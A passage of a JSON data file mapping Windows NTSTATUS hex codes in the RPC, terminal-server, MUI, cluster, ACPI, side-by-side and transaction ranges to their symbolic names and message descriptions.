floating point underflow occurred at the RPC server.\"\n        },\n        \"c0020048\": {\n            \"code\": \"RPC_NT_FP_OVERFLOW\",\n            \"description\": \"A floating point overflow occurred at the RPC server.\"\n        },\n        \"c0020049\": {\n            \"code\": \"RPC_NT_CALL_IN_PROGRESS\",\n            \"description\": \"An RPC is already in progress for this thread.\"\n        },\n        \"c002004a\": {\n            \"code\": \"RPC_NT_NO_MORE_BINDINGS\",\n            \"description\": \"There are no more bindings.\"\n        },\n        \"c002004b\": {\n            \"code\": \"RPC_NT_GROUP_MEMBER_NOT_FOUND\",\n            \"description\": \"The group member was not found.\"\n        },\n        \"c002004c\": {\n            \"code\": \"EPT_NT_CANT_CREATE\",\n            \"description\": \"The endpoint mapper database entry could not be created.\"\n        },\n        \"c002004d\": {\n            \"code\": \"RPC_NT_INVALID_OBJECT\",\n            \"description\": \"The object UUID is the nil UUID.\"\n        },\n        \"c002004f\": {\n            \"code\": \"RPC_NT_NO_INTERFACES\",\n            \"description\": \"No interfaces have been registered.\"\n        },\n        \"c0020050\": {\n            \"code\": \"RPC_NT_CALL_CANCELLED\",\n            \"description\": \"The RPC was canceled.\"\n        },\n        \"c0020051\": {\n            \"code\": \"RPC_NT_BINDING_INCOMPLETE\",\n            \"description\": \"The binding handle does not contain all the required information.\"\n        },\n        \"c0020052\": {\n            \"code\": \"RPC_NT_COMM_FAILURE\",\n            \"description\": \"A communications failure occurred during an RPC.\"\n        },\n        \"c0020053\": {\n            \"code\": \"RPC_NT_UNSUPPORTED_AUTHN_LEVEL\",\n            \"description\": \"The requested authentication level is not supported.\"\n        },\n        \"c0020054\": {\n            \"code\": \"RPC_NT_NO_PRINC_NAME\",\n            \"description\": \"No principal name was registered.\"\n        },\n        \"c0020055\": {\n            \"code\": \"RPC_NT_NOT_RPC_ERROR\",\n            \"description\": \"The error specified is not a valid Windows RPC error code.\"\n        },\n        \"c0020057\": {\n            \"code\": \"RPC_NT_SEC_PKG_ERROR\",\n            \"description\": \"A security package-specific error occurred.\"\n        },\n        \"c0020058\": {\n            \"code\": \"RPC_NT_NOT_CANCELLED\",\n            \"description\": \"The thread was not canceled.\"\n        },\n        \"c0020062\": {\n            \"code\": \"RPC_NT_INVALID_ASYNC_HANDLE\",\n            \"description\": \"Invalid asynchronous RPC handle.\"\n        },\n        \"c0020063\": {\n            \"code\": \"RPC_NT_INVALID_ASYNC_CALL\",\n            \"description\": \"Invalid asynchronous RPC call handle for this operation.\"\n        },\n        \"c0020064\": {\n            \"code\": \"RPC_NT_PROXY_ACCESS_DENIED\",\n            \"description\": \"Access to the HTTP proxy is denied.\"\n        },\n        \"c0030001\": {\n            \"code\": \"RPC_NT_NO_MORE_ENTRIES\",\n            \"description\": \"The list of RPC servers available for auto-handle binding has been exhausted.\"\n        },\n        \"c0030002\": {\n            \"code\": \"RPC_NT_SS_CHAR_TRANS_OPEN_FAIL\",\n            \"description\": \"The file designated by DCERPCCHARTRANS cannot be opened.\"\n        },\n        \"c0030003\": {\n            \"code\": \"RPC_NT_SS_CHAR_TRANS_SHORT_FILE\",\n            \"description\": \"The file containing the character translation table has fewer than 512 bytes.\"\n        },\n        \"c0030004\": {\n            \"code\": \"RPC_NT_SS_IN_NULL_CONTEXT\",\n            \"description\": \"A null context handle is passed as an [in] parameter.\"\n        },\n        \"c0030005\": {\n            \"code\": \"RPC_NT_SS_CONTEXT_MISMATCH\",\n            \"description\": \"The context handle does not match any known context handles.\"\n        },\n        \"c0030006\": {\n            \"code\": \"RPC_NT_SS_CONTEXT_DAMAGED\",\n            \"description\": \"The context handle changed during a call.\"\n        },\n        \"c0030007\": {\n            \"code\": \"RPC_NT_SS_HANDLES_MISMATCH\",\n            \"description\": \"The binding handles passed to an RPC do not match.\"\n        },\n        \"c0030008\": {\n            \"code\": \"RPC_NT_SS_CANNOT_GET_CALL_HANDLE\",\n            \"description\": \"The stub is unable to get the call handle.\"\n        },\n        \"c0030009\": {\n            \"code\": \"RPC_NT_NULL_REF_POINTER\",\n            \"description\": \"A null reference pointer was passed to the stub.\"\n        },\n        \"c003000a\": {\n            \"code\": \"RPC_NT_ENUM_VALUE_OUT_OF_RANGE\",\n            \"description\": \"The enumeration value is out of range.\"\n        },\n        \"c003000b\": {\n            \"code\": \"RPC_NT_BYTE_COUNT_TOO_SMALL\",\n            \"description\": \"The byte count is too small.\"\n        },\n        \"c003000c\": {\n            \"code\": \"RPC_NT_BAD_STUB_DATA\",\n            \"description\": \"The stub received bad data.\"\n        },\n        \"c0030059\": {\n            \"code\": \"RPC_NT_INVALID_ES_ACTION\",\n            \"description\": \"Invalid operation on the encoding/decoding handle.\"\n        },\n        \"c003005a\": {\n            \"code\": \"RPC_NT_WRONG_ES_VERSION\",\n            \"description\": \"Incompatible version of the serializing package.\"\n        },\n        \"c003005b\": {\n            \"code\": \"RPC_NT_WRONG_STUB_VERSION\",\n            \"description\": \"Incompatible version of the RPC stub.\"\n        },\n        \"c003005c\": {\n            \"code\": \"RPC_NT_INVALID_PIPE_OBJECT\",\n            \"description\": \"The RPC pipe object is invalid or corrupt.\"\n        },\n        \"c003005d\": {\n            \"code\": \"RPC_NT_INVALID_PIPE_OPERATION\",\n            \"description\": \"An invalid operation was attempted on an RPC pipe object.\"\n        },\n        \"c003005e\": {\n            \"code\": \"RPC_NT_WRONG_PIPE_VERSION\",\n            \"description\": \"Unsupported RPC pipe version.\"\n        },\n        \"c003005f\": {\n            \"code\": \"RPC_NT_PIPE_CLOSED\",\n            \"description\": \"The RPC pipe object has already been closed.\"\n        },\n        \"c0030060\": {\n            \"code\": \"RPC_NT_PIPE_DISCIPLINE_ERROR\",\n            \"description\": \"The RPC call completed before all pipes were processed.\"\n        },\n        \"c0030061\": {\n            \"code\": \"RPC_NT_PIPE_EMPTY\",\n            \"description\": \"No more data is available from the RPC pipe.\"\n        },\n        \"c0040035\": {\n            \"code\": \"STATUS_PNP_BAD_MPS_TABLE\",\n            \"description\": \"A device is missing in the system BIOS MPS table. This device will not be used. Contact your system vendor for a system BIOS update.\"\n        },\n        \"c0040036\": {\n            \"code\": \"STATUS_PNP_TRANSLATION_FAILED\",\n            \"description\": \"A translator failed to translate resources.\"\n        },\n        \"c0040037\": {\n            \"code\": \"STATUS_PNP_IRQ_TRANSLATION_FAILED\",\n            \"description\": \"An IRQ translator failed to translate resources.\"\n        },\n        \"c0040038\": {\n            \"code\": \"STATUS_PNP_INVALID_ID\",\n            \"description\": \"Driver %2 returned an invalid ID for a child device (%3).\"\n        },\n        \"c0040039\": {\n            \"code\": \"STATUS_IO_REISSUE_AS_CACHED\",\n            \"description\": \"Reissue the given operation as a cached I/O operation\"\n        },\n        \"c00a0001\": {\n            \"code\": \"STATUS_CTX_WINSTATION_NAME_INVALID\",\n            \"description\": \"Session name %1 is invalid.\"\n        },\n        \"c00a0002\": {\n            \"code\": \"STATUS_CTX_INVALID_PD\",\n            \"description\": \"The protocol driver %1 is invalid.\"\n        },\n        \"c00a0003\": {\n            \"code\": \"STATUS_CTX_PD_NOT_FOUND\",\n            \"description\": \"The protocol driver %1 was not found in the system path.\"\n        },\n        \"c00a0006\": {\n            \"code\": \"STATUS_CTX_CLOSE_PENDING\",\n            \"description\": \"A close operation is pending on the terminal connection.\"\n        },\n        \"c00a0007\": {\n            \"code\": \"STATUS_CTX_NO_OUTBUF\",\n            \"description\": \"No free output buffers are available.\"\n        },\n        \"c00a0008\": {\n            \"code\": \"STATUS_CTX_MODEM_INF_NOT_FOUND\",\n            \"description\": \"The MODEM.INF file was not found.\"\n        },\n        \"c00a0009\": {\n            \"code\": \"STATUS_CTX_INVALID_MODEMNAME\",\n            \"description\": \"The modem (%1) was not found in the MODEM.INF file.\"\n        },\n        \"c00a000a\": {\n            \"code\": \"STATUS_CTX_RESPONSE_ERROR\",\n            \"description\": \"The modem did not accept the command sent to it. Verify that the configured modem name matches the attached modem.\"\n        },\n        \"c00a000b\": {\n            \"code\": \"STATUS_CTX_MODEM_RESPONSE_TIMEOUT\",\n            \"description\": \"The modem did not respond to the command sent to it. Verify that the modem cable is properly attached and the modem is turned on.\"\n        },\n        \"c00a000c\": {\n            \"code\": \"STATUS_CTX_MODEM_RESPONSE_NO_CARRIER\",\n            \"description\": \"Carrier detection has failed or the carrier has been dropped due to disconnection.\"\n        },\n        \"c00a000d\": {\n            \"code\": \"STATUS_CTX_MODEM_RESPONSE_NO_DIALTONE\",\n            \"description\": \"A dial tone was not detected within the required time. Verify that the phone cable is properly attached and functional.\"\n        },\n        \"c00a000e\": {\n            \"code\": \"STATUS_CTX_MODEM_RESPONSE_BUSY\",\n            \"description\": \"A busy signal was detected at a remote site on callback.\"\n        },\n        \"c00a000f\": {\n            \"code\": \"STATUS_CTX_MODEM_RESPONSE_VOICE\",\n            \"description\": \"A voice was detected at a remote site on callback.\"\n        },\n        \"c00a0010\": {\n            \"code\": \"STATUS_CTX_TD_ERROR\",\n            \"description\": \"Transport driver error.\"\n        },\n        \"c00a0012\": {\n            \"code\": \"STATUS_CTX_LICENSE_CLIENT_INVALID\",\n            \"description\": \"The client you are using is not licensed to use this system. Your logon request is denied.\"\n        },\n        \"c00a0013\": {\n            \"code\": \"STATUS_CTX_LICENSE_NOT_AVAILABLE\",\n            \"description\": \"The system has reached its licensed logon limit. Try again later.\"\n        },\n        \"c00a0014\": {\n            \"code\": \"STATUS_CTX_LICENSE_EXPIRED\",\n            \"description\": \"The system license has expired. Your logon request is denied.\"\n        },\n        \"c00a0015\": {\n            \"code\": \"STATUS_CTX_WINSTATION_NOT_FOUND\",\n            \"description\": \"The specified session cannot be found.\"\n        },\n        \"c00a0016\": {\n            \"code\": \"STATUS_CTX_WINSTATION_NAME_COLLISION\",\n            \"description\": \"The specified session name is already in use.\"\n        },\n        \"c00a0017\": {\n            \"code\": \"STATUS_CTX_WINSTATION_BUSY\",\n            \"description\": \"The requested operation cannot be completed because the terminal connection is currently processing a connect, disconnect, reset, or delete operation.\"\n        },\n        \"c00a0018\": {\n            \"code\": \"STATUS_CTX_BAD_VIDEO_MODE\",\n            \"description\": \"An attempt has been made to connect to a session whose video mode is not supported by the current client.\"\n        },\n        \"c00a0022\": {\n            \"code\": \"STATUS_CTX_GRAPHICS_INVALID\",\n            \"description\": \"The application attempted to enable DOS graphics mode. DOS graphics mode is not supported.\"\n        },\n        \"c00a0024\": {\n            \"code\": \"STATUS_CTX_NOT_CONSOLE\",\n            \"description\": \"The requested operation can be performed only on the system console. This is most often the result of a driver or system DLL requiring direct console access.\"\n        },\n        \"c00a0026\": {\n            \"code\": \"STATUS_CTX_CLIENT_QUERY_TIMEOUT\",\n            \"description\": \"The client failed to respond to the server connect message.\"\n        },\n        \"c00a0027\": {\n            \"code\": \"STATUS_CTX_CONSOLE_DISCONNECT\",\n            \"description\": \"Disconnecting the console session is not supported.\"\n        },\n        \"c00a0028\": {\n            \"code\": \"STATUS_CTX_CONSOLE_CONNECT\",\n            \"description\": \"Reconnecting a disconnected session to the console is not supported.\"\n        },\n        \"c00a002a\": {\n            \"code\": \"STATUS_CTX_SHADOW_DENIED\",\n            \"description\": \"The request to control another session remotely was denied.\"\n        },\n        \"c00a002b\": {\n            \"code\": \"STATUS_CTX_WINSTATION_ACCESS_DENIED\",\n            \"description\": \"A process has requested access to a session, but has not been granted those access rights.\"\n        },\n        \"c00a002e\": {\n            \"code\": \"STATUS_CTX_INVALID_WD\",\n            \"description\": \"The terminal connection driver %1 is invalid.\"\n        },\n        \"c00a002f\": {\n            \"code\": \"STATUS_CTX_WD_NOT_FOUND\",\n            \"description\": \"The terminal connection driver %1 was not found in the system path.\"\n        },\n        \"c00a0030\": {\n            \"code\": \"STATUS_CTX_SHADOW_INVALID\",\n            \"description\": \"The requested session cannot be controlled remotely. You cannot control your own session, a session that is trying to control your session, a session that has no user logged on, or other sessions from the console.\"\n        },\n        \"c00a0031\": {\n            \"code\": \"STATUS_CTX_SHADOW_DISABLED\",\n            \"description\": \"The requested session is not configured to allow remote control.\"\n        },\n        \"c00a0032\": {\n            \"code\": \"STATUS_RDP_PROTOCOL_ERROR\",\n            \"description\": \"The RDP protocol component %2 detected an error in the protocol stream and has disconnected the client.\"\n        },\n        \"c00a0033\": {\n            \"code\": \"STATUS_CTX_CLIENT_LICENSE_NOT_SET\",\n            \"description\": \"Your request to connect to this terminal server has been rejected. Your terminal server client license number has not been entered for this copy of the terminal client. Contact your system administrator for help in entering a valid, unique license number for this terminal server client. Click OK to continue.\"\n        },\n        \"c00a0034\": {\n            \"code\": \"STATUS_CTX_CLIENT_LICENSE_IN_USE\",\n            \"description\": \"Your request to connect to this terminal server has been rejected. Your terminal server client license number is currently being used by another user. Contact your system administrator to obtain a new copy of the terminal server client with a valid, unique license number. Click OK to continue.\"\n        },\n        \"c00a0035\": {\n            \"code\": \"STATUS_CTX_SHADOW_ENDED_BY_MODE_CHANGE\",\n            \"description\": \"The remote control of the console was terminated because the display mode was changed. Changing the display mode in a remote control session is not supported.\"\n        },\n        \"c00a0036\": {\n            \"code\": \"STATUS_CTX_SHADOW_NOT_RUNNING\",\n            \"description\": \"Remote control could not be terminated because the specified session is not currently being remotely controlled.\"\n        },\n        \"c00a0037\": {\n            \"code\": \"STATUS_CTX_LOGON_DISABLED\",\n            \"description\": \"Your interactive logon privilege has been disabled. Contact your system administrator.\"\n        },\n        \"c00a0038\": {\n            \"code\": \"STATUS_CTX_SECURITY_LAYER_ERROR\",\n            \"description\": \"The terminal server security layer detected an error in the protocol stream and has disconnected the client.\"\n        },\n        \"c00a0039\": {\n            \"code\": \"STATUS_TS_INCOMPATIBLE_SESSIONS\",\n            \"description\": \"The target session is incompatible with the current session.\"\n        },\n        \"c00b0001\": {\n            \"code\": \"STATUS_MUI_FILE_NOT_FOUND\",\n            \"description\": \"The resource loader failed to find an MUI file.\"\n        },\n        \"c00b0002\": {\n            \"code\": \"STATUS_MUI_INVALID_FILE\",\n            \"description\": \"The resource loader failed to load an MUI file because the file failed to pass validation.\"\n        },\n        \"c00b0003\": {\n            \"code\": \"STATUS_MUI_INVALID_RC_CONFIG\",\n            \"description\": \"The RC manifest is corrupted with garbage data, is an unsupported version, or is missing a required item.\"\n        },\n        \"c00b0004\": {\n            \"code\": \"STATUS_MUI_INVALID_LOCALE_NAME\",\n            \"description\": \"The RC manifest has an invalid culture name.\"\n        },\n        \"c00b0005\": {\n            \"code\": \"STATUS_MUI_INVALID_ULTIMATEFALLBACK_NAME\",\n            \"description\": \"The RC manifest has and invalid ultimate fallback name.\"\n        },\n        \"c00b0006\": {\n            \"code\": \"STATUS_MUI_FILE_NOT_LOADED\",\n            \"description\": \"The resource loader cache does not have a loaded MUI entry.\"\n        },\n        \"c00b0007\": {\n            \"code\": \"STATUS_RESOURCE_ENUM_USER_STOP\",\n            \"description\": \"The user stopped resource enumeration.\"\n        },\n        \"c0130001\": {\n            \"code\": \"STATUS_CLUSTER_INVALID_NODE\",\n            \"description\": \"The cluster node is not valid.\"\n        },\n        \"c0130002\": {\n            \"code\": \"STATUS_CLUSTER_NODE_EXISTS\",\n            \"description\": \"The cluster node already exists.\"\n        },\n        \"c0130003\": {\n            \"code\": \"STATUS_CLUSTER_JOIN_IN_PROGRESS\",\n            \"description\": \"A node is in the process of joining the cluster.\"\n        },\n        \"c0130004\": {\n            \"code\": \"STATUS_CLUSTER_NODE_NOT_FOUND\",\n            \"description\": \"The cluster node was not found.\"\n        },\n        \"c0130005\": {\n            \"code\": \"STATUS_CLUSTER_LOCAL_NODE_NOT_FOUND\",\n            \"description\": \"The cluster local node information was not found.\"\n        },\n        \"c0130006\": {\n            \"code\": \"STATUS_CLUSTER_NETWORK_EXISTS\",\n            \"description\": \"The cluster network already exists.\"\n        },\n        \"c0130007\": {\n            \"code\": \"STATUS_CLUSTER_NETWORK_NOT_FOUND\",\n            \"description\": \"The cluster network was not found.\"\n        },\n        \"c0130008\": {\n            \"code\": \"STATUS_CLUSTER_NETINTERFACE_EXISTS\",\n            \"description\": \"The cluster network interface already exists.\"\n        },\n        \"c0130009\": {\n            \"code\": \"STATUS_CLUSTER_NETINTERFACE_NOT_FOUND\",\n            \"description\": \"The cluster network interface was not found.\"\n        },\n        \"c013000a\": {\n            \"code\": \"STATUS_CLUSTER_INVALID_REQUEST\",\n            \"description\": \"The cluster request is not valid for this object.\"\n        },\n        \"c013000b\": {\n            \"code\": \"STATUS_CLUSTER_INVALID_NETWORK_PROVIDER\",\n            \"description\": \"The cluster network provider is not valid.\"\n        },\n        \"c013000c\": {\n            \"code\": \"STATUS_CLUSTER_NODE_DOWN\",\n            \"description\": \"The cluster node is down.\"\n        },\n        \"c013000d\": {\n            \"code\": \"STATUS_CLUSTER_NODE_UNREACHABLE\",\n            \"description\": \"The cluster node is not reachable.\"\n        },\n        \"c013000e\": {\n            \"code\": \"STATUS_CLUSTER_NODE_NOT_MEMBER\",\n            \"description\": \"The cluster node is not a member of the cluster.\"\n        },\n        \"c013000f\": {\n            \"code\": \"STATUS_CLUSTER_JOIN_NOT_IN_PROGRESS\",\n            \"description\": \"A cluster join operation is not in progress.\"\n        },\n        \"c0130010\": {\n            \"code\": \"STATUS_CLUSTER_INVALID_NETWORK\",\n            \"description\": \"The cluster network is not valid.\"\n        },\n        \"c0130011\": {\n            \"code\": \"STATUS_CLUSTER_NO_NET_ADAPTERS\",\n            \"description\": \"No network adapters are available.\"\n        },\n        \"c0130012\": {\n            \"code\": \"STATUS_CLUSTER_NODE_UP\",\n            \"description\": \"The cluster node is up.\"\n        },\n        \"c0130013\": {\n            \"code\": \"STATUS_CLUSTER_NODE_PAUSED\",\n            \"description\": \"The cluster node is paused.\"\n        },\n        \"c0130014\": {\n            \"code\": \"STATUS_CLUSTER_NODE_NOT_PAUSED\",\n            \"description\": \"The cluster node is not paused.\"\n        },\n        \"c0130015\": {\n            \"code\": \"STATUS_CLUSTER_NO_SECURITY_CONTEXT\",\n            \"description\": \"No cluster security context is available.\"\n        },\n        \"c0130016\": {\n            \"code\": \"STATUS_CLUSTER_NETWORK_NOT_INTERNAL\",\n            \"description\": \"The cluster network is not configured for internal cluster communication.\"\n        },\n        \"c0130017\": {\n            \"code\": \"STATUS_CLUSTER_POISONED\",\n            \"description\": \"The cluster node has been poisoned.\"\n        },\n        \"c0140001\": {\n            \"code\": \"STATUS_ACPI_INVALID_OPCODE\",\n            \"description\": \"An attempt was made to run an invalid AML opcode.\"\n        },\n        \"c0140002\": {\n            \"code\": \"STATUS_ACPI_STACK_OVERFLOW\",\n            \"description\": \"The AML interpreter stack has overflowed.\"\n        },\n        \"c0140003\": {\n            \"code\": \"STATUS_ACPI_ASSERT_FAILED\",\n            \"description\": \"An inconsistent state has occurred.\"\n        },\n        \"c0140004\": {\n            \"code\": \"STATUS_ACPI_INVALID_INDEX\",\n            \"description\": \"An attempt was made to access an array outside its bounds.\"\n        },\n        \"c0140005\": {\n            \"code\": \"STATUS_ACPI_INVALID_ARGUMENT\",\n            \"description\": \"A required argument was not specified.\"\n        },\n        \"c0140006\": {\n            \"code\": \"STATUS_ACPI_FATAL\",\n            \"description\": \"A fatal error has occurred.\"\n        },\n        \"c0140007\": {\n            \"code\": \"STATUS_ACPI_INVALID_SUPERNAME\",\n            \"description\": \"An invalid SuperName was specified.\"\n        },\n        \"c0140008\": {\n            \"code\": \"STATUS_ACPI_INVALID_ARGTYPE\",\n            \"description\": \"An argument with an incorrect type was specified.\"\n        },\n        \"c0140009\": {\n            \"code\": \"STATUS_ACPI_INVALID_OBJTYPE\",\n            \"description\": \"An object with an incorrect type was specified.\"\n        },\n        \"c014000a\": {\n            \"code\": \"STATUS_ACPI_INVALID_TARGETTYPE\",\n            \"description\": \"A target with an incorrect type was specified.\"\n        },\n        \"c014000b\": {\n            \"code\": \"STATUS_ACPI_INCORRECT_ARGUMENT_COUNT\",\n            \"description\": \"An incorrect number of arguments was specified.\"\n        },\n        \"c014000c\": {\n            \"code\": \"STATUS_ACPI_ADDRESS_NOT_MAPPED\",\n            \"description\": \"An address failed to translate.\"\n        },\n        \"c014000d\": {\n            \"code\": \"STATUS_ACPI_INVALID_EVENTTYPE\",\n            \"description\": \"An incorrect event type was specified.\"\n        },\n        \"c014000e\": {\n            \"code\": \"STATUS_ACPI_HANDLER_COLLISION\",\n            \"description\": \"A handler for the target already exists.\"\n        },\n        \"c014000f\": {\n            \"code\": \"STATUS_ACPI_INVALID_DATA\",\n            \"description\": \"Invalid data for the target was specified.\"\n        },\n        \"c0140010\": {\n            \"code\": \"STATUS_ACPI_INVALID_REGION\",\n            \"description\": \"An invalid region for the target was specified.\"\n        },\n        \"c0140011\": {\n            \"code\": \"STATUS_ACPI_INVALID_ACCESS_SIZE\",\n            \"description\": \"An attempt was made to access a field outside the defined range.\"\n        },\n        \"c0140012\": {\n            \"code\": \"STATUS_ACPI_ACQUIRE_GLOBAL_LOCK\",\n            \"description\": \"The global system lock could not be acquired.\"\n        },\n        \"c0140013\": {\n            \"code\": \"STATUS_ACPI_ALREADY_INITIALIZED\",\n            \"description\": \"An attempt was made to reinitialize the ACPI subsystem.\"\n        },\n        \"c0140014\": {\n            \"code\": \"STATUS_ACPI_NOT_INITIALIZED\",\n            \"description\": \"The ACPI subsystem has not been initialized.\"\n        },\n        \"c0140015\": {\n            \"code\": \"STATUS_ACPI_INVALID_MUTEX_LEVEL\",\n            \"description\": \"An incorrect mutex was specified.\"\n        },\n        \"c0140016\": {\n            \"code\": \"STATUS_ACPI_MUTEX_NOT_OWNED\",\n            \"description\": \"The mutex is not currently owned.\"\n        },\n        \"c0140017\": {\n            \"code\": \"STATUS_ACPI_MUTEX_NOT_OWNER\",\n            \"description\": \"An attempt was made to access the mutex by a process that was not the owner.\"\n        },\n        \"c0140018\": {\n            \"code\": \"STATUS_ACPI_RS_ACCESS\",\n            \"description\": \"An error occurred during an access to region space.\"\n        },\n        \"c0140019\": {\n            \"code\": \"STATUS_ACPI_INVALID_TABLE\",\n            \"description\": \"An attempt was made to use an incorrect table.\"\n        },\n        \"c0140020\": {\n            \"code\": \"STATUS_ACPI_REG_HANDLER_FAILED\",\n            \"description\": \"The registration of an ACPI event failed.\"\n        },\n        \"c0140021\": {\n            \"code\": \"STATUS_ACPI_POWER_REQUEST_FAILED\",\n            \"description\": \"An ACPI power object failed to transition state.\"\n        },\n        \"c0150001\": {\n            \"code\": \"STATUS_SXS_SECTION_NOT_FOUND\",\n            \"description\": \"The requested section is not present in the activation context.\"\n        },\n        \"c0150002\": {\n            \"code\": \"STATUS_SXS_CANT_GEN_ACTCTX\",\n            \"description\": \"Windows was unble to process the application binding information. Refer to the system event log for further information.\"\n        },\n        \"c0150003\": {\n            \"code\": \"STATUS_SXS_INVALID_ACTCTXDATA_FORMAT\",\n            \"description\": \"The application binding data format is invalid.\"\n        },\n        \"c0150004\": {\n            \"code\": \"STATUS_SXS_ASSEMBLY_NOT_FOUND\",\n            \"description\": \"The referenced assembly is not installed on the system.\"\n        },\n        \"c0150005\": {\n            \"code\": \"STATUS_SXS_MANIFEST_FORMAT_ERROR\",\n            \"description\": \"The manifest file does not begin with the required tag and format information.\"\n        },\n        \"c0150006\": {\n            \"code\": \"STATUS_SXS_MANIFEST_PARSE_ERROR\",\n            \"description\": \"The manifest file contains one or more syntax errors.\"\n        },\n        \"c0150007\": {\n            \"code\": \"STATUS_SXS_ACTIVATION_CONTEXT_DISABLED\",\n            \"description\": \"The application attempted to activate a disabled activation context.\"\n        },\n        \"c0150008\": {\n            \"code\": \"STATUS_SXS_KEY_NOT_FOUND\",\n            \"description\": \"The requested lookup key was not found in any active activation context.\"\n        },\n        \"c0150009\": {\n            \"code\": \"STATUS_SXS_VERSION_CONFLICT\",\n            \"description\": \"A component version required by the application conflicts with another component version that is already active.\"\n        },\n        \"c015000a\": {\n            \"code\": \"STATUS_SXS_WRONG_SECTION_TYPE\",\n            \"description\": \"The type requested activation context section does not match the query API used.\"\n        },\n        \"c015000b\": {\n            \"code\": \"STATUS_SXS_THREAD_QUERIES_DISABLED\",\n            \"description\": \"Lack of system resources has required isolated activation to be disabled for the current thread of execution.\"\n        },\n        \"c015000c\": {\n            \"code\": \"STATUS_SXS_ASSEMBLY_MISSING\",\n            \"description\": \"The referenced assembly could not be found.\"\n        },\n        \"c015000e\": {\n            \"code\": \"STATUS_SXS_PROCESS_DEFAULT_ALREADY_SET\",\n            \"description\": \"An attempt to set the process default activation context failed because the process default activation context was already set.\"\n        },\n        \"c015000f\": {\n            \"code\": \"STATUS_SXS_EARLY_DEACTIVATION\",\n            \"description\": \"The activation context being deactivated is not the most recently activated one.\"\n        },\n        \"c0150010\": {\n            \"code\": \"STATUS_SXS_INVALID_DEACTIVATION\",\n            \"description\": \"The activation context being deactivated is not active for the current thread of execution.\"\n        },\n        \"c0150011\": {\n            \"code\": \"STATUS_SXS_MULTIPLE_DEACTIVATION\",\n            \"description\": \"The activation context being deactivated has already been deactivated.\"\n        },\n        \"c0150012\": {\n            \"code\": \"STATUS_SXS_SYSTEM_DEFAULT_ACTIVATION_CONTEXT_EMPTY\",\n            \"description\": \"The activation context of the system default assembly could not be generated.\"\n        },\n        \"c0150013\": {\n            \"code\": \"STATUS_SXS_PROCESS_TERMINATION_REQUESTED\",\n            \"description\": \"A component used by the isolation facility has requested that the process be terminated.\"\n        },\n        \"c0150014\": {\n            \"code\": \"STATUS_SXS_CORRUPT_ACTIVATION_STACK\",\n            \"description\": \"The activation context activation stack for the running thread of execution is corrupt.\"\n        },\n        \"c0150015\": {\n            \"code\": \"STATUS_SXS_CORRUPTION\",\n            \"description\": \"The application isolation metadata for this process or thread has become corrupt.\"\n        },\n        \"c0150016\": {\n            \"code\": \"STATUS_SXS_INVALID_IDENTITY_ATTRIBUTE_VALUE\",\n            \"description\": \"The value of an attribute in an identity is not within the legal range.\"\n        },\n        \"c0150017\": {\n            \"code\": \"STATUS_SXS_INVALID_IDENTITY_ATTRIBUTE_NAME\",\n            \"description\": \"The name of an attribute in an identity is not within the legal range.\"\n        },\n        \"c0150018\": {\n            \"code\": \"STATUS_SXS_IDENTITY_DUPLICATE_ATTRIBUTE\",\n            \"description\": \"An identity contains two definitions for the same attribute.\"\n        },\n        \"c0150019\": {\n            \"code\": \"STATUS_SXS_IDENTITY_PARSE_ERROR\",\n            \"description\": \"The identity string is malformed. This might be due to a trailing comma, more than two unnamed attributes, a missing attribute name, or a missing attribute value.\"\n        },\n        \"c015001a\": {\n            \"code\": \"STATUS_SXS_COMPONENT_STORE_CORRUPT\",\n            \"description\": \"The component store has become corrupted.\"\n        },\n        \"c015001b\": {\n            \"code\": \"STATUS_SXS_FILE_HASH_MISMATCH\",\n            \"description\": \"A component's file does not match the verification information present in the component manifest.\"\n        },\n        \"c015001c\": {\n            \"code\": \"STATUS_SXS_MANIFEST_IDENTITY_SAME_BUT_CONTENTS_DIFFERENT\",\n            \"description\": \"The identities of the manifests are identical, but their contents are different.\"\n        },\n        \"c015001d\": {\n            \"code\": \"STATUS_SXS_IDENTITIES_DIFFERENT\",\n            \"description\": \"The component identities are different.\"\n        },\n        \"c015001e\": {\n            \"code\": \"STATUS_SXS_ASSEMBLY_IS_NOT_A_DEPLOYMENT\",\n            \"description\": \"The assembly is not a deployment.\"\n        },\n        \"c015001f\": {\n            \"code\": \"STATUS_SXS_FILE_NOT_PART_OF_ASSEMBLY\",\n            \"description\": \"The file is not a part of the assembly.\"\n        },\n        \"c0150020\": {\n            \"code\": \"STATUS_ADVANCED_INSTALLER_FAILED\",\n            \"description\": \"An advanced installer failed during setup or servicing.\"\n        },\n        \"c0150021\": {\n            \"code\": \"STATUS_XML_ENCODING_MISMATCH\",\n            \"description\": \"The character encoding in the XML declaration did not match the encoding used in the document.\"\n        },\n        \"c0150022\": {\n            \"code\": \"STATUS_SXS_MANIFEST_TOO_BIG\",\n            \"description\": \"The size of the manifest exceeds the maximum allowed.\"\n        },\n        \"c0150023\": {\n            \"code\": \"STATUS_SXS_SETTING_NOT_REGISTERED\",\n            \"description\": \"The setting is not registered.\"\n        },\n        \"c0150024\": {\n            \"code\": \"STATUS_SXS_TRANSACTION_CLOSURE_INCOMPLETE\",\n            \"description\": \"One or more required transaction members are not present.\"\n        },\n        \"c0150025\": {\n            \"code\": \"STATUS_SMI_PRIMITIVE_INSTALLER_FAILED\",\n            \"description\": \"The SMI primitive installer failed during setup or servicing.\"\n        },\n        \"c0150026\": {\n            \"code\": \"STATUS_GENERIC_COMMAND_FAILED\",\n            \"description\": \"A generic command executable returned a result that indicates failure.\"\n        },\n        \"c0150027\": {\n            \"code\": \"STATUS_SXS_FILE_HASH_MISSING\",\n            \"description\": \"A component is missing file verification information in its manifest.\"\n        },\n        \"c0190001\": {\n            \"code\": \"STATUS_TRANSACTIONAL_CONFLICT\",\n            \"description\": \"The function attempted to use a name that is reserved for use by another transaction.\"\n        },\n        \"c0190002\": {\n            \"code\": \"STATUS_INVALID_TRANSACTION\",\n            \"description\": \"The transaction handle associated with this operation is invalid.\"\n        },\n        \"c0190003\": {\n            \"code\": \"STATUS_TRANSACTION_NOT_ACTIVE\",\n            \"description\": \"The requested operation was made in the context of a transaction that is no longer active.\"\n        },\n        \"c0190004\": {\n            \"code\": \"STATUS_TM_INITIALIZATION_FAILED\",\n            \"description\": \"The transaction manager was unable to be successfully initialized. Transacted operations are not supported.\"\n        },\n        \"c0190005\": {\n            \"code\": \"STATUS_RM_NOT_ACTIVE\",\n            \"description\": \"Transaction support within the specified file system resource manager was not started or was shut down due to an error.\"\n        },\n        \"c0190006\": {\n            \"code\": \"STATUS_RM_METADATA_CORRUPT\",\n            \"description\": \"The metadata of the resource manager has been corrupted. The resource manager will not function.\"\n        },\n        \"c0190007\": {\n            \"code\": 